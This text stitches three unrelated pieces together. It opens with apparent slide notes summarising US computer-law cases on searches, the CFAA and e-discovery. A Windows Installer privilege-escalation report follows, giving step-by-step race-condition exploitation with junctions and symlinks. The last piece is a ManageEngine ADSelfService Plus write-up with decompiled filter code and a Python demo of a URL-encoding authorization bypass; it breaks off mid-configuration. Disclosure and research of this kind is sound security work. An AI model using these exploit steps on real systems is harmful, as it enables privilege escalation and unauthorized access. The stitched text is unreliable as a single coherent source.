Government sought review of an order from the Court which granted a
motion filed by defendant and codefendant to suppress their e-mail
communications in their trial on charges of conspiring to commit
extortion and transmitting a threatening communication with intent to
extort in violation.
While executing a search warrant at defendant's home to obtain
evidence of his alleged extortion, agents from the Federal Bureau of
Investigation seized defendant's computer and external storage
devices, which were later searched at an FBI computer lab. The agents
also seized and subsequently searched a computer belonging to
codefendant, who lived with defendant, even though she had not been
identified as a suspect and was not named as a target in the warrant.
Searches
United States v. Adjani, 452 F.3d 1140 (9th Cir. Cal. July 11, 2006)
Although individuals undoubtedly have a high expectation of privacy
in the files stored on their personal computers, we have never held that
agents may establish probable cause to search only those items owned
or possessed by the criminal suspect. The law is to the contrary. "The
critical element in a reasonable search is not that the owner of the
property is suspected of crime but that there is reasonable cause to
believe that the specific 'things' to be searched for and seized are
located on the property to which entry is sought." Zurcher v. Stanford
Daily, 436 U.S. 547, 556, 98 S. Ct. 1970, 56 L. Ed. 2d 525 (1978); cf.
United States v. Ross, 456 U.S. 798, 820-21, 102 S. Ct. 2157, 72 L. Ed.
2d 572 (1982)
Searches
Seizures
United States v. Olander, 2006 U.S. Dist. LEXIS 66824 (D. Ore.
September 18, 2006)
Warrant at issue sought authority to search for and seize any
computer hardware, software, or storage devices that could
contain evidence of Olander's means to access, store, and view
child pornography. Defendant voluntarily subjected external
portions of his computer to expert examination, after his
computer was reasonably viewed as possibly part of the "entire
computer system" used by David Olander and could have
contained evidence of David Olander's crimes.
Seizures
United States v. Olander, 2006 U.S. Dist. LEXIS 66824 (D. Ore.
September 18, 2006)
The computer was seized properly under the warrant as a possible
instrumentality of the crimes being investigated. The warrant
allowed agents to search for and to seize "instrumentalities" that
may contain evidence of the crime of possession of child
pornography. There was a fair probability that defendant's
computer contained evidence of David Olander's crimes and may
have facilitated the commission of those crimes. "The critical
element in a reasonable search is not that the owner of the property
is suspected of crime but that there is reasonable cause to believe
that the specific 'things' to be searched for and seized are located on
the property to which entry is sought."
Searches
United States v. Hibble, 2006 U.S. Dist. LEXIS 65421 (D. Ariz.
September 11, 2006)
Defense counsel objects to the Magistrate Judge's R & R because
he misunderstood the use and operation of computers, the internet,
and technology and was, therefore, misled by the Government
into believing that there was an unequivocal factual basis to
support the search warrant. The Defendant argues that the
Magistrate Judge should have heard testimony from his expert
regarding the inexactitude of the facts relied on to establish
probable cause as follows: 1) Internet Protocol Addresses; 2)
Activity on Defendant's Computer; 3) Dates and Times of
Activities; 4) Where did the Files Come From; 5) File Names; 6)
Need More Sources; 7) Banning Users; 8) Hackers and Spoofers,
and 9) Investigative Tools.
Searches
United States v. Hibble, 2006 U.S. Dist. LEXIS 65421 (D. Ariz.
September 11, 2006)
Defendant used an unsecured wireless router to access the internet.
Defendant challenges the Government's claim that SA Andrews
downloaded files from Defendant's computer because the files
could have easily been downloaded from another computer that
was accessing the Defendant's IPA. Also, anyone who accesses the
IPA through an unsecured wireless router can remotely access
Defendant's computer and files can be downloaded, uploaded, or
deleted from the Defendant's computer without the Defendant even
knowing it. Defendant argues that SA Andrews should have
confirmed that it was in fact Defendant's activity emanating from
the Defendant's computer
Searches
United States v. Larson, 2006 CCA LEXIS 362, (A.F. Ct
of Crim Aps. December 7, 2006)
The military appellate court first held that the servicemember
had no reasonable expectation of privacy in the Internet
history files of the government computer which were recorded
automatically as part of the computer's operating system.
Searches
United States v. Steiger, 2006 U.S. Dist. LEXIS 89832
(M. Dt. Ala. September 7, 2006)
Defendant’s issues:
(1) An anonymous hacker who provided information to police
concerning Steiger was an agent of the government therefore
search violated Fourth Amendment.
(2) Government's search warrant affidavit omitted material
information by failing to state that hacker had obtained
information about Steiger through the unauthorized search of
his computer files.
Searches
United States v. Ziegler, 474 F.3d 1184 (9th Cir. Mont.
January 30, 2007)
The employer consented to a search of the hard drive of defendant's
workplace computer; therefore, a warrantless search of the
computer was reasonable under the Fourth Amendment.
Co-workers, acting at direction of federal agent, who entered
defendant's office at night to copy hard drive of defendant's
workplace computer received consent to search defendant's
office and key to defendant's office from employer's chief
financial officer
Court must determine whether an employee has an expectation
of privacy in his workplace computer sufficient to suppress
images of child pornography sought to be admitted into
evidence in a criminal prosecution.
Searches
Soderstrand v. State ex rel. Bd. of Regents of Okla. Agric.
& Mech. Colleges, 2006 U.S. Dist. LEXIS 85402 (W. D.
Okla. November 22, 2006)
Plaintiff department head alleged that his personal laptop
computer was improperly taken from his office at Oklahoma
State University. The petition alleged a state law claim for
conversion, and a federal claim against defendants, security
analyst, dean, and associate dean, for unreasonable search and
seizure in violation of the Fourth Amendment to the United
States Constitution. The parties moved for summary judgment.
Court held dean, associate dean, and security analyst were
entitled to qualified immunity. Search of hard drive was
justified at inception and its scope was reasonably related to
the circumstances which justified it. Evidence showed no
conduct violated the Fourth Amendment
Searches
United States v. Hassoun, 2007 U.S. Dist. LEXIS 3404 (S.D. Fla.
January 17, 2007)
FBI seized two computer disks from Defendant's work area
and copied two hard drives and email associated with the
Defendant located on the Defendant's work computer. Prior to the
search, the employer executed a Consent to Search Form. After the
June seizure, the Government obtained a warrant to search and
seize the contents of the two seized computers and email.
Defendant argues, first, that the warrant violates the Fourth
Amendment by failing to describe with sufficient particularity the items
to be seized. Second, that the search and seizure exceeded the scope of
the warrant.
Third, agents knowingly or recklessly included a material false
statement in the affidavit in support of the search warrant.
Defendant did not have legitimate expectation of privacy in the
work computer, related components and email seized.
Searches
United States v. Venkataram, 2007 U.S. Dist. LEXIS 852, (S.D.N.Y.
January 5, 2007)
In order for the warrantless search of Defendant's offices to be
illegal, Defendant must first show that he had a reasonable
expectation of privacy in the areas searched at the time of the
search, after which he must still show that the search was
unreasonable. See O'Connor v. Ortega, 480 U.S. 709, 107 S. Ct.
1492, 94 L. Ed. 2d 714 (1987). Traditionally, to make this
showing, the defendant "must demonstrate (1) that he had an
expectation of privacy that society is prepared to consider
reasonable and (2) that he had acted in a way with respect to
the property in question that indicated a subjective expectation
of privacy." Shaul v. Cherry Valley-Springfield Cent. Sch., 363
F.3d 177, 181-82 (2d Cir. 2004). The burden of showing
standing -- "that he had a legitimate expectation of privacy" --
to object to the legality of a search rests with the defendant.
Rawlings v. Kentucky, 448 U.S. 98, 104-05, 100 S. Ct. 2556, 65 L.
Ed. 2d 633 (1980).
CFAA –Civil Litigation
Chas. S. Winner, Inc. v. Polistina, 2007 WL
1652292 (D.N.J. June 04, 2007)
The CFAA was historically a criminal statute
penalizing unauthorized access, i.e., “hacking”
into computers. The CFAA has been used
increasingly in civil suits by employers to sue
former employees and their new companies for
misappropriation of information from the
employer's computer system.
CFAA –Civil Litigation
L-3 Communications Westwood Corp. v. Robichaux, 2007 WL
756528 (E.D. La. Mar 08, 2007)
Defendant employees of L-3
Computer forensics shows 110,000 files copied to a 120 GB
external hard drive.
L-3's loss of trade secrets and lost profits not contemplated by
the CFAA. Losses under CFAA are compensable when they
result from damage to a computer system or the inoperability
of the accessed system. The CFAA permits recovery for lost
revenue only where connected to an interruption of service.
There is no allegation that there was damage to L-3's computer
or an interruption of service in this case.
Because L-3 has not asserted that there was damage to their
computers or an interruption of service, it has not alleged a
cognizable loss under the CFAA. Accordingly, L-3 has not
demonstrated a likelihood of success on the merits of the
CFAA claim.
CFAA –Civil Litigation
P.C. of Yonkers, Inc. v. Celebrations! The Party and Seasonal
Superstore, L.L.C., 2007 WL 708978 (D. N.J. Mar 05, 2007)
CFAA's private cause of action sets forth a two-part injury
requirement. Plaintiff must: (1) suffer a root injury of damage or
loss; and (2) suffer one of five operatively-substantial effects set
forth in subsection (a)(5)(B)(i)-(v).
(i) loss to 1 or more persons during any 1-year period (and, for purposes of an
investigation, prosecution, or other proceeding brought by the United States
only, loss resulting from a related course of conduct affecting 1 or more other
protected computers) aggregating at least $5,000 in value;
(ii) the modification or impairment, or potential modification or impairment,
of the medical examination, diagnosis, treatment, or care of 1 or more
individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a government entity in
furtherance of the administration of justice, national defense, or national
security.
CFAA –Civil Litigation
P.C. of Yonkers, Inc. v. Celebrations! The Party and Seasonal
Superstore, L.L.C., 2007 WL 708978 (D. N.J. Mar 05, 2007)
No damage to the data, system, or information on Plaintiffs'
computers is alleged within Plaintiffs' CFAA claims
Loss, treated separate from damage under the CFAA, is defined as
"any reasonable cost to any victim, including the cost of
responding to an offense, conducting a damage assessment, and
restoring the data, program, system, or information to its
condition prior to the offense, and any revenue lost, cost incurred,
or other consequential damages incurred because of interruption
of service."
The plain language of the CFAA treats lost revenue as a different
concept from incurred costs, and permits recovery of the former
only where connected to an interruption in service.
Plaintiffs have alleged that as a result of Defendants' unauthorized
access and use of the information they have suffered and will
continue to suffer substantial losses in excess of $5,000.00,
including but not limited to losses sustained in responding to
defendants' actions, investigating defendants' actions and taking
remedial steps to prevent defendants' further actions.
CFAA –Civil Litigation
PharMerica, Inc. v. Arledge, 2007 WL 865510
(M.D. Fla. March 21, 2007)
Arledge was a top-level member of PharMerica’s management team
March 9, 2007, Arledge resigns – becomes VP at Omnicare
PharMerica examines the laptop computer Arledge used and
discovers several thousand e-mails on the laptop but that the
“C” hard drive was virtually empty
March 14, 2007, PharMerica learned that:
February 13, 2007, Arledge downloaded a copy of the Mercer Report,
which was marked “CLEAN” (regarding PharMerica's hub and
spoke system), to an external personal AOL account
( [email protected] ) Later that day, Arledge met President and
Executive Vice-President of Omnicare at Omnicare's headquarters
March 7, 2007, two days prior to his resignation, Arledge copied
almost all of his electronic files from his work computer and then
permanently deleted most of those files, 475 of these files
CFAA –Civil Litigation
PharMerica, Inc. v. Arledge, 2007 WL 865510 (M.D. Fla.
March 21, 2007)
TRO Granted - Arledge Ordered to:
a. Immediately return to PharMerica any and all documents, data, and
information Arledge has taken from PharMerica and enjoining any use or
disclosure of PharMerica's Confidential Information;
b. Immediately cease use or deletion of any materials from the computer to
which he sent or uploaded PharMerica documents and any and all other
computers, equipment, USB storage devices, hard drives, PDA's, or any similar
device on which data may be stored, in his custody, possession or control (“the
Computer Equipment”).
c. Within two days of his receipt of the Order, deliver the Computer Equipment to
PharMerica's computer expert, Adam Sharp, E-Hounds, Inc., 2045 Lawson Road,
Clearwater, Florida 33763, so that PharMerica's expert can examine and copy the
information on the computer Equipment.
d. Within ten days of his receipt of the Order, appear for deposition by
PharMerica.
e. Immediately postpone beginning his new employment with Omnicare until at
least 10 days after all of the above requirements are met; the deposition is
concluded; and, allow PharMerica time to seek additional relief if necessary
Corporate Lawsuits
Advanced Micro Devices, inc. v. Intel Corp., (D. Del. Filed
June 27, 2005)
Electronic Mail Retention Policy - Intel
Discovery Millions of E-Mails
Intel’s document retention policy instructs users to move e-mails
off their PCs onto hard drives.
Some employees fail to do so.
Intel has an automatic e-mail deletion system, which activates
every couple of months or so.
Discovery
Memry Corp. v. Kentucky Oil Technology, N.V., 2007
WL 832937 (N.D. Cal. Mar 19, 2007)
STC alleges that many of the documents produced by KOT have
not been originals and have been produced in such a way as to
obscure important information. STC also alleges that KOT has
failed to produce numerous responsive documents, thus warranting
full disclosure of KOT's computer hard drives
Case different from cases where courts allowed independent
experts to obtain and search a "mirror image." Those cases all
involve an extreme situation where data is likely to be destroyed or
where computers have a special connection to the lawsuit.
Main allegation of complaint defendants improperly used their employer's
computers to sabotage the plaintiff's business. Ameriwood Industries, Inc. v
Liberman, 2006 WL 3825291 (E.D. Mo. Dec. 27, 2006)
Limited discovery of mirror image of hard drives where alleged defendants
had launched attacks on plaintiff's file servers, and electronic data related to
those attacks was apparently on the computers. Physicians Interactive v.
Lathian Sys., Inc., 2003 WL 23018270 (E.D. Va. Dec 5, 2003)
Hard drive mirroring allowed where defendants' continuous use of computers
was making it likely that relevant electronic data would be overwritten before
it could be accessed in the normal course of discovery. Antioch Co. v
Scrapbook Borders, Inc., 210 F.R.D. 645 (D. Minn 2002)
Metadata & Use in Lawsuits
E-Discovery in effect December 1, 2006
One federal case – produce documents with metadata
intact
Parties free to negotiate how to handle metadata
Discovery
Rozell v. Ross, 2006 U.S. Dist. LEXIS 2277 (S.D.N.Y. Jan 20, 2006)
When a plaintiff claims that a defendant improperly accessed her
e-mail account, does every e-mail transmitted through that
account become subject to discovery? Plaintiff asserted claims
of: (1) sexual harassment and retaliation in violation of Title
VII of the Civil Rights Act of 1964, the New York State Human
Rights Law, and the New York City Human Rights Law; (2)
violation of the ECPA, 18 USC § 2701; and (3) computer
trespassing. Defendants now move to compel production of
e-mails sent through the plaintiff's account. For the reasons
discussed below, the defendants' motion is granted in part and
denied in part.
Discovery
Whatley v. S.C. Dep't of Pub. Safety, 2007 U.S. Dist. LEXIS 2391 (D.
S.C. January 10, 2007)
Electronic mail communications can normally be
authenticated by affidavit of a recipient, comparison of
the communication's content with other evidence, or
statements from the purported author acknowledging the
email communication.
Discovery
Hawkins v. Cavalli, 2006 U.S. Dist. LEXIS 73143 (N.D. Cal.
September 22, 2006)
Issue – whether the trial court's admission of allegedly unreliable
computer records violated due process rights
Held- In upholding the admission of the evidence, the
California Court of Appeal was persuaded by a Louisiana case,
which held that printouts of the results of a computer's internal
operations are not hearsay, because they are not statements,
nor are they representations of statements placed into the
computer by out of court declarants. State v. Armstead, 432
So.2d 837, 840 (La. 1983). Under Armstead, the test for
admissibility of a printout reflecting a computer's internal
operations is not whether the printout was made in the regular
course of business, but whether the computer was functioning
properly at the time the printout was produced.
Discovery
Hawkins v. Cavalli, 2006 U.S. Dist. LEXIS 73143 (N.D. Cal.
September 22, 2006)
Some courts consider all computer records hearsay, admissible
only under the business records or public records exceptions.
Other courts distinguish between computer-stored records and
computer-generated records. These courts have held that computer-
generated records are not hearsay because they are independent of
human observations and reporting. Id. at 157-58; see also, e.g.,
United States v. Khorozian, 333 F.3d 498, 505 (3d Cir. 2003)
(citing Mueller & Kirkpatrick, Federal Evidence, § 380, at 65 (2d
ed. 1994)) (holding that a header generated by a fax machine was
not hearsay, because "nothing 'said' by a machine... is hearsay");
United States v. Hamilton, 413 F.3d 1138, 1142 (10th Cir. 2005)
(holding that header information accompanying pornographic
images uploaded to the internet were not hearsay). These courts
have reasoned that because the computer instantaneously generated
the header information without the assistance of a person, there
was neither a "statement" nor a "declarant."
Discovery
Mackelprang v. Fid. Nat'l Title Agency of Nev., Inc., 2007 U.S. Dist.
LEXIS 2379 (D. Nev January 9, 2007)
Defendant also argues that it is entitled to obtain production of the
Myspace.com private email communications because they may
contain statements made by Plaintiff and witnesses about the
subject matter of this case which could presumably constitute
admissions by Plaintiff or which could potentially be used to
impeach the witnesses' testimony. In addition, Defendant argues
that the private email messages may contain information that
Plaintiff's alleged severe emotional distress was caused by factors
other than Defendant's alleged sexual harassment misconduct.
Discovery
Mackelprang v. Fid. Nat'l Title Agency of Nev., Inc., 2007 U.S. Dist.
LEXIS 2379 (D. Nev January 9, 2007)
The Myspace.com accounts were opened several months after
Plaintiff left Defendant's employment. Assuming that the
Myspace.com account contains sexually related email messages
exchanged between Plaintiff and others, such evidence would not
be admissible to support Defendants' defense that their prior
alleged sexual conduct was welcomed by Plaintiff. The courts
applying Rule 412 have declined to recognize a sufficiently
relevant connection between a plaintiff's non-work related sexual
activity and the allegation that he or she was subjected to
unwelcome and offensive sexual advancements in the workplace.
Ordering Plaintiff to execute the consent and authorization form for
release of all of the private email messages on Plaintiff's
Myspace.com internet accounts would allow Defendants to cast too
wide a net for any information that might be relevant and
discoverable.
Discovery
Oscher v. Solomon Tropp Law Group, P.A. (In re Atl. Int'l Mortg.
Co.) 2006 Bankr. LEXIS 2487 (August 2, 2006)
The trustee argued that the law firm, after having notice of its duty
to preserve electronic evidence, either lost or destroyed backup
tapes for the years most relevant to the firm's representation of the
debtor. The court found that the law firm and its counsel responded
to legitimate discovery requests with disingenuousness,
obfuscation, and frivolous claims of privilege and that they twice
filed meritless appeals of non-appealable discovery orders in
attempts to prevent meaningful discovery by the trustee. The court
concluded that the conduct of the firm and its counsel was totally
devoid of the cooperation required by the rules governing
discovery and that monetary sanctions were appropriate.
Discovery
Potter v. Havlicek, 2007 WL 539534 (S.D.Ohio, February 14, 2007)
Before the Court is a motion requesting an injunction forbidding
Defendant Jeffery Havlicek from “any use, disclosure, copying,
dissemination or destruction of electronic communications,
electronic files, data recordings, audio recordings, video
recordings, and any other documents, objects, information, or data,
in his possession or control which contain or relate to any
statements, communications, writings, thoughts, images, sounds,
ideas or personal information of Plaintiff Christina Potter.”
E-Discovery
Scotts Co. LLC v. Liberty Mut. Ins. Co., 2007 WL
1723509 (S.D.Ohio, Jun 12, 2007)
... entitled to an order, in the form proposed by plaintiff,
that would require defendant to allow a forensic expert to
search defendant's computer systems, network servers and
databases and would require defendant to provide back up
tapes of certain information systems ...
Privacy
State of New Jersey v. Reid, No. A-3424-05T5, 2007 WL 135685
(N.J. Super. Ct. App. Div. Jan. 22, 2007).
New Jersey Constitution provides for protection of information
held by third parties.
Spyware
Sotelo v. Directrevenue, 2005 U.S. Dist. LEXIS 18877, (N.D. Ill.
August 29, 2005)
Plaintiff computer user brought a class action suit against defendants for
trespass to personal property, unjust enrichment, negligence, and violation of
Illinois consumer fraud and computer tampering statutes. After removing the
suit to federal court, defendants filed motions to dismiss and to stay in favor
of arbitration.
Sotelo v. Ebates Shopping.com, Inc., 2006 U.S. Dist. LEXIS 83539
(N.D. Ill Nov. 13, 2006)
Plaintiff filed his complaint on behalf of two classes--a nationwide class (Class
A) and an Illinois class (Class B). Ebates is incorporated in California and
has its principal place of business there. In the complaint, Plaintiff alleges on
behalf of both classes that Ebates caused a software program, Moe Money
Maker, to be downloaded onto users' computers, without the users' consent in
violation of: 1) the Computer Fraud and Abuse Act, 2) the Electronic
Communications Privacy Act, 18 U.S.C. § 2707, 2520; and 3) the California
Business and Professional Code.
Civil Suits
Butera & Andrews v. IBM, 2006 U.S. Dist. LEXIS 75318 (D. D.C.
October 18, 2006)
Butera & Andrews brings this action against IBM and an
unidentified John Doe defendant, seeking monetary damages and
injunctive relief for alleged interference with the plaintiff's
computer records in violation of the Computer Fraud and Abuse
Act, the Stored Wire and Electronic Communications Act, and
the Federal Wiretap Act. The plaintiff contends that the alleged
violations were committed "with IBM owned or operated
equipment and were directed by IBM employees or agents." The
plaintiff asks that "all information illicitly obtained from [the]
plaintiff" be returned, and that the defendants pay the plaintiff for
its damages, "including damages for items illicitly taken, the costs
of investigation, the cost of additional security measures, statutory
damages and attorney's fees for this action." Defendant moved to
dismiss; the court granted IBM's motion.
Civil Suits
ViChip Corp. v. Tsu-Chang Lee, 2006 U.S. Dist. LEXIS 41756 (N.D.
Cal., June 9, 2006)
Plaintiff alleged that the CEO stole confidential and proprietary
information from the corporation; breach of contract; breach of fiduciary
duty; theft of trade secret; and violation of the Computer Fraud and
Abuse Act (CFAA)
Corporation was an electrical engineering company involved in the
manufacture and sale of integrated circuits. CEO counterclaims against
the corporation for declaratory relief regarding ownership of the
intellectual property, misappropriation, unjust enrichment, and
intentional interference with contract relations and prospective economic
advantage.
Ownership of the underlying technology rested with the corporation.
Court noted former CEO signed a valid employee agreement, which
contained a confidentiality provision that CEO breached when he
removed and destroyed provisional patent information from the
corporation's files and property. CEO's unauthorized destruction of the
corporation's electronic files entitled the corporation to summary
judgment on the CFAA claim.
Corporate Espionage
Oracle Corp. v. SAP AG, (N.D. Cal. Filed March 22, 2007)
Eleven Claims for Relief
Violation of CFAA 18 U.S.C. § 1030(a)(2)(C) & (a)(4) & (a)(5)
Intentional interference with Prospective Economic Advantage
Conversion
Trespass to Chattels
Alleges SAP infiltrated Oracle’s systems by using log-in
information of defecting customers and concealed true identity
using phony telephone numbers and false e-mail addresses.
Oracle alleges more than 10,000 illegal downloads traced to an IP
address at SAP's Bryan, Texas headquarters.
Contact Information
[email protected] | pdf |
MSI - Microsoft Windows Installer Elevation of Privilege
Summary: Under some circumstances, the Microsoft Windows Installer allows a "standard user" to perform an arbitrary
permissions and content overwrite with SYSTEM privileges.
( Microsoft Windows Installer: https://docs.microsoft.com/en-us/windows/win32/msi/windows-installer-portal )
Products affected: Windows 10 Enterprise (1903) with latest security update (2019 November patch) and probably
also other versions (not tested). Windows 10 Enterprise - INSIDER PREVIEW (Fast ring) 10.0.19033 - Build 19033
Description:
The "Windows Installer service" allows an MSI package to be installed as a "standard user".
In my research I noticed that when a "standard user" installs an MSI package, the "Windows Installer
service" triggers some operations with SYSTEM privileges. (see image below from Procmon)
Continuing my research, I found that after a package is installed on the system, a "standard user" can
force a repair of the product with the "/f" command-line parameter.
In our case, for example, the command "msiexec /qn /fa foo.msi" triggers the repair operation.
While running this command, a couple of interesting operations caught my attention.
As SYSTEM, the "Windows Installer service" tries to set the permissions of the package files that are going to be
reinstalled.
After that, it reads and writes the content of the package files (stored within the MSI package).
See image below from Procmon.
As we can see, the first time the "Windows Installer service" tries to open one of the files it impersonates the
"standard user" and gets a "PRIVILEGE NOT HELD" result; it then closes the file and reopens it as SYSTEM
without impersonating! Afterward, it continues to set the permissions of the file as SYSTEM and writes its content.
This is clearly a point of possible exploitation! To obtain the desired result, a race condition has to be
successfully exploited. The race window lies between the moment the "Windows Installer
service" closes the file as the "standard user" and reopens it as SYSTEM, just before it writes the DACLs and the
content.
Now that the logical workflow seems a little bit clear (I hope), I’ll try to describe the steps executed by the exploit.
First of all: I've built an MSI package (foo.msi) that can also be installed as a "standard user"; this means that the MSI
service will install all files in C:\Users\[USER]\AppData\Local . In our particular case, I’ve built this MSI package
which installs only the file “foo.txt” into C:\Users\[USER]\AppData\Local\fakemsi\ directory (C# VS2017 project
will also be sent with this report).
In order to make the MSI package installable by “standard user”, I’ve run against it the following command:
"C:\Program Files (x86)\Windows Kits\10\bin\10.0.17763.0\x86\MsiInfo.exe"
"C:\temp2\Setup1\Setup1\Debug\foo.msi" -w 10
(MsiInfo belongs to WDK, so watch out for your version
REF : https://docs.microsoft.com/en-us/windows/win32/msi/msiinfo-exe)
These are the steps that the exploit performs:
-
Before exploiting, remove old temporary directories used for junctions.
-
Create an empty directory C:\Users\[USER]\foomsi
-
Create empty directory C:\Users\[USER]\AppData\Local\fakemsi ; this is the directory that MSI package will
create in order to save “foo.txt” file
-
Create a junction from C:\Users\[USER]\AppData\Local\fakemsi to C:\Users\[USER]\foomsi (the MSI service
will not delete it) so we can later abuse this junction to gain privileges. That's the tricky part.
-
Create a sort of symbolic link in “\RPC Control” object namespace. This link will be named “foo.txt” and it
points to the file we want to own (c:\windows\win.ini in this case)
-
Remove the msi package (even if it doesn't exist): command "msiexec /qn /x foo.msi"
-
Install the msi package: command “msiexec /qn /i foo.msi“
-
Start a thread to win the race condition and, just milliseconds later, trigger the Windows Installer service with the
command "msiexec /qn /fa foo.msi" in order to exploit the "setSecurity" operation and win the race.
-
The thread starts watching for the existence of C:\Users\[USER]\AppData\Local\fakemsi\foo.txt
-
As soon as C:\Users\[USER]\AppData\Local\fakemsi\foo.txt has been renamed by the MSI service and no longer
exists, the exploit will set a reparse point (a junction) from
C:\Users\[USER]\AppData\Local\fakemsi\ to “\RPC Control”
-
At this point, the MSI service creates C:\Users\[USER]\AppData\Local\fakemsi\foo.txt again, and the path will
REPARSE into "\RPC Control", where "foo.txt" is a link pointing to the target file; this is how
the setSecurity operation gets exploited (we gain a file content overwrite too). That's the core of the race
condition (and of the exploit) that we'll try to win; a matter of milliseconds.
-
Below is a screenshot (from Procmon) of a successful exploitation. I have marked all the important
operations that can be observed:
1) MSI service executes “CreateFile” successfully impersonating “normal” user.
2) Exploit sets mountpoint from C:\Users\[USER]\AppData\Local\fakemsi\ to “\RPC Control”
3) MSI service does a REPARSE to target file (C:\windows\win.ini in this case) and executes “CreateFile”
successfully as SYSTEM user
4) MSI service sets the security DACL as SYSTEM; it grants the "normal" user FULL CONTROL over the target file.
5) MSI service writes content read from “foo.txt” file inside foo.msi package.
This exploit can overwrite DACL of files that are fully owned by SYSTEM.
Most of the time in my tests the exploit works on the first try. If it doesn't, re-run it; it should work.
I have provided a full working PoC:
- Note: all files in "bin_MsiExploit" need to stay in the same directory (please read readme.txt inside the
zipped file)
All the source code needed:
- exploit source code - VS 2017 C++ (src_MsiExploit directory)
- msi package source code - VS 2017 C# already provided in previous emails
Screens shots:
Successful exploitation on Windows 10 Enterprise Insider Preview (Fast ring) 10.0.19033
Conclusions:
I think the bug stems from an incorrectly impersonated operation when writing the DACLs.
Best Regards,
Christian Danieli (@padovah4ck)
Zoho ManageEngine ADSelfService Plus

I. Preface

I happened to see this article, and it piqued my curiosity:
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
It says the file upload and command injection were never fixed, and the authorization-bypass patch it describes also looked suspect to me, so I grabbed the latest build to test.
It turned out I had fetched the wrong version and wasted a whole day of work: the newest build on the Chinese official site is 6115.
Everything discussed below only applies to build 6115. The actual latest official build is 6117, and starting with build 6116 the security filter's scope was simply changed to *.
That change renders most of the holes unexploitable, and the filter itself is essentially impossible to bypass: if the URI you request is not defined in the security configuration it errors out immediately, as do mismatched parameter names or parameter values outside the allowed range, so even the exclude list is of little use.

II. Authorization bypass

The article above mentions that the vendor wrote a getNormalizedURI method to fix the authorization bypass. It looked wrong to me at first glance, so let's first trace through the filter.
A filter is defined in web.xml:

```xml
<filter>
    <filter-name>ADSFilter</filter-name>
    <filter-class>com.manageengine.ads.fw.filter.ADSFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>ADSFilter</filter-name>
    <url-pattern>/*</url-pattern>
    <dispatcher>FORWARD</dispatcher>
    <dispatcher>REQUEST</dispatcher>
</filter-mapping>
```
The ADSFilter code is as follows:

```java
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse,
        FilterChain filterChain) throws IOException, ServletException {
    HttpServletRequest request = (HttpServletRequest) servletRequest;
    HttpServletResponse response = (HttpServletResponse) servletResponse;
    boolean haveSetCredential = RestAPI.setUserCredentialsForRestAPI(request, this.filterParams);
    if (this.doSubFilters(servletRequest, servletResponse, filterChain)) {
        filterChain.doFilter(request, response);
    }
    if (haveSetCredential) {
        AuthUtil.flushCredentials();
    }
}
```

This means doSubFilters must return true for a request to pass the filter. Inside doSubFilters there is this fragment:

```java
if (RestAPIUtil.isRestAPIRequest(request, this.filterParams)
        && !RestAPIFilter.doAction(servletRequest, servletResponse, this.filterParams, this.filterConfig)) {
    return false;
}
```

Step into RestAPIUtil.isRestAPIRequest:
```java
public static boolean isRestAPIRequest(HttpServletRequest request, JSONObject filterParams) {
    String restApiUrlPattern = "/RestAPI/.*";
    try {
        restApiUrlPattern = filterParams.optString("API_URL_PATTERN", restApiUrlPattern);
    } catch (Exception var5) {
        out.log(Level.INFO, "Unable to get API_URL_PATTERN.", var5);
    }
    String reqURI = request.getRequestURI();
    String contextPath = request.getContextPath() != null ? request.getContextPath() : "";
    reqURI = reqURI.replace(contextPath, "");
    reqURI = reqURI.replace("//", "/");
    return Pattern.matches(restApiUrlPattern, reqURI);
}
```

Here the request path is taken directly from getRequestURI and matched against "/RestAPI/.*"; matching the raw, undecoded URI is what made the original /./RestAPI/xxx bypass possible.
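The weakness of matching the raw request URI can be reproduced outside the product. Below is a minimal Python re-implementation of the check; the "/RestAPI/.*" pattern comes from the decompiled code, while the endpoint name in the sample path is just illustrative.

```python
import re
from urllib.parse import unquote

# Pattern used by RestAPIUtil.isRestAPIRequest (Pattern.matches is a full match).
REST_API_PATTERN = r"/RestAPI/.*"

def is_rest_api_request(req_uri: str) -> bool:
    """Rough re-implementation of the build-6115 filter check: it matches
    the raw request URI without URL-decoding it first."""
    req_uri = req_uri.replace("//", "/")
    return re.fullmatch(REST_API_PATTERN, req_uri) is not None

raw = "/%52estAPI/LogonCustomization"      # %52 decodes to 'R'
print(is_rest_api_request(raw))            # False -> the security filter is skipped
print(is_rest_api_request(unquote(raw)))   # True  -> yet the servlet container
                                           # decodes the path and still routes
                                           # the request to /RestAPI/*
```

The gap between what the filter sees and what the container routes is the whole bypass.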
To fix this, the new version added the getNormalizedURI helper:

```java
public static String getNormalizedURI(String path) {
    if (path == null) {
        return null;
    } else {
        String normalized = path;
        if (path.indexOf(92) >= 0) {
            normalized = path.replace('\\', '/');
        }
        if (!normalized.startsWith("/")) {
            normalized = "/" + normalized;
        }
        boolean addedTrailingSlash = false;
        if (normalized.endsWith("/.") || normalized.endsWith("/..")) {
            normalized = normalized + "/";
            addedTrailingSlash = true;
        }
        while (true) {
            int index = normalized.indexOf("/./");
            if (index < 0) {
                while (true) {
                    index = normalized.indexOf("/../");
                    if (index < 0) {
                        if (normalized.length() > 1 && addedTrailingSlash) {
                            normalized = normalized.substring(0, normalized.length() - 1);
                        }
                        return normalized;
                    }
                    if (index == 0) {
                        return null;
                    }
                    int index2 = normalized.lastIndexOf(47, index - 1);
                    normalized = normalized.substring(0, index2) + normalized.substring(index + 3);
                }
            }
            normalized = normalized.substring(0, index) + normalized.substring(index + 2);
        }
    }
}
```

Even so, it can still be bypassed outright, and simply URL-encoding "RestAPI" in the request path also gets past the check.

III. File upload and command-argument injection

1. RestAPI

The article said the file upload and the command injection were never fixed, so I assumed that meant straightforward RCE; it turned out I was overthinking it.
First, look at how /RestAPI/* is defined:
```xml
<servlet-mapping>
    <servlet-name>action</servlet-name>
    <url-pattern>/RestAPI/*</url-pattern>
</servlet-mapping>
<servlet>
    <servlet-name>action</servlet-name>
    <servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
    <init-param>
        <param-name>config</param-name>
        <param-value>/WEB-INF/struts-config.xml, /WEB-INF/accounts-struts-config.xml, /adsf/struts-config.xml, /WEB-INF/api-struts-config.xml, /WEB-INF/mobile/struts-config.xml</param-value>
    </init-param>
    <init-param>
        <param-name>validate</param-name>
        <param-value>true</param-value>
    </init-param>
    <init-param>
        <param-name>chainConfig</param-name>
